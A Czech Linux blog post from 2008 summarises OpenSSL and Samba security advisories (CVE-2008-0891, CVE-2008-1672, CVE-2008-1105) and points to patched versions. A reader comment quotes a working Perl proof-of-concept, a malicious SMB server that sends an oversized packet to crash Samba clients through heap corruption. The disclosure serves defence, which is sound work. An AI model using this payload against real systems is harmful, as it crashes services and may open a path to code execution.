abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 18:33 | Nová verze Ladislav Hagara | Komentářů: 0
    dnes 12:55 | Zajímavý projekt

    TamaGo je open source framework pro programování ARM a RISC-V systémů na čipu (SoC) v programovacím jazyce Go. Prezentace projektu z OSFC (Open Source Firmware Conference) v pdf na GitHubu.

    Ladislav Hagara | Komentářů: 0
    včera 21:44 | Komunita

    Konference OpenAlt 2024 – jedinečné fórum, kde se každoročně sdružují lidé se zájmem o vývoj a využití svobodného a otevřeného softwaru a hardwaru, tvorbu, zpracování a zpřístupňování otevřených dat, svobodný přístup k informacím a vzdělávání – hledá přednášející, dobrovolníky a partnery. Konference proběhne 2. a 3. listopadu v prostorách FIT VUT v Brně. Vstup je zdarma.

    Ladislav Hagara | Komentářů: 0
    včera 19:44 | Nová verze

    Po 9 týdnech vývoje od vydání Linuxu 6.10 oznámil Linus Torvalds vydání Linuxu 6.11. Z Vídně, jelikož tam zítra začíná Open Source Summit Europe. Přehled novinek a vylepšení na LWN.net: první a druhá polovina začleňovacího okna. Později také na Linux Kernel Newbies.

    Ladislav Hagara | Komentářů: 0
    včera 12:00 | Zajímavý software

    Grocy je open source ERP systém. Ne však pro plánování zdrojů v podnicích ale v domácnostech. Spravovat lze zásoby, povinnosti a úkoly. Vytvářet nákupní seznamy. Ověřovat dostupnost surovin pro recepty. Plánovat jídelníčky. Vyzkoušet lze online demo. Vývoj probíhá na GitHubu.

    Ladislav Hagara | Komentářů: 5
    14.9. 19:44 | Komunita

    Na čem aktuálně pracují vývojáři GNOME a KDE? Pravidelný přehled novinek v Týden v GNOME a Týden v KDE.

    Ladislav Hagara | Komentářů: 0
    13.9. 23:11 | IT novinky

    3D tiskárny Original Prusa MK4S (a MK4) v kombinaci s Prusamenty PLA a PETG mají mezinárodně uznávanou certifikaci UL 2904 GREENGUARD, která potvrzuje splnění přísných bezpečnostních standardů pro VOC a UFP.

    Ladislav Hagara | Komentářů: 2
    13.9. 22:11 | Nová verze

    Byla vydána verze R1/beta5 open source operačního systému Haiku (Wikipedie). Přehled novinek i s náhledy v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 7
    13.9. 16:33 | Komunita

    Sovereign Tech Fund (Wikipedie), tj. program financování otevřeného softwaru německým ministerstvem hospodářství a ochrany klimatu, podpoří Sambu částkou 688 800 eur.

    Ladislav Hagara | Komentářů: 48
    13.9. 13:11 | IT novinky

    Společnost OpenAI představila novou řadu svých AI modelů OpenAI o1 navržených tak, aby "strávily více času přemýšlením, než zareagují". Videoukázky na 𝕏 nebo YouTube.

    Ladislav Hagara | Komentářů: 6
    Rozcestník

    OpenSSL a Samba / bezpečnostní problémy

    28.5.2008 18:35 | Přečteno: 2282× | GNU/Linux | poslední úprava: 29.5.2008 17:57


    Dnes byly zveřejněny bezpečnostní problémy v OpenSSL SecurityFocus bid 29405 a Sambě SecurityFocus bid 29404. Nová verze OpenSSL 0.9.8h opravuje dva bezpečnostní problémy. Jde o CVE-2008-0891 a CVE-2008-1672. Pokud byla knihovna OpenSSL přeložena s rozšířením "TLS server name" (implicitně vypnuto), může útočník na dálku shodit serverovou službu využívající této knihovny. Druhý problém může být pro změnu zneužít obráceně. Klientská aplikace může být shozena (crash) zákeřným serverem při navazování šifrované komunikace.

    Ukázky shození openssl jak klienta (openssl s_client ...), tak i serveru (openssl s_server ...), například na CERT-FI.

    Samba dnes také nebyla ušetřena. V oznámení na stránce Secunia.com se píše o přetečení (Buffer Overflow) ve funkci receive_smb_raw() v souboru lib/util_sock.c. Problém byl vývojářům Samby oznámen 15. května a dnes 28. května byl oficiálně zveřejněn. Jedná se o bezpečnostní problém CVE-2008-1105.

    V případě, že lze klientskou část obelstít a přinutit ji k navázání spojení se zákeřným serverem, například pouhým kliknutím na odkaz "smb://" nebo zasláním speciálně upraveného datového bloku nmbd serveru, lze ji také (i když zatím pouze teoreticky) přinutit spustit libovolný kód.

    Poněvadž serverová část, speciálně proces smbd, může být současně klientem, týká se tento bezpečnostní problém také Samba serveru.

    V linuxových distribucích se postupně objevují bezpečnostní aktualizace.
    Například RedHat Bug 446724 a bezpečnostní oznámení RHSA-2008-0288 a RHSA-2008-0290.

    K dispozici je už také nová verze Samby 3.0.30.

           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    2.6.2008 12:46 Ladislav Hagara | skóre: 103 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: OpenSSL a Samba / bezpečnostní problémy
    Bugtraq ID 29404 (SAMBA) zmiňuje následující POC (Proof Of Concept).
    #!/usr/bin/perl
    # 06/01/2008 - k`sOSe
    #
    # ~ # smbclient //localhost/w00t
    # *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
    #
    
    use warnings;
    use strict;
    use IO::Socket;
    
    
    my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);
    
    while(my $csock = $sock->accept())
    {
    	print $csock	"\x00" .
    			"\x01\xff\xff" .
    			"\x41" x 131071;
    			
    }
    
    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.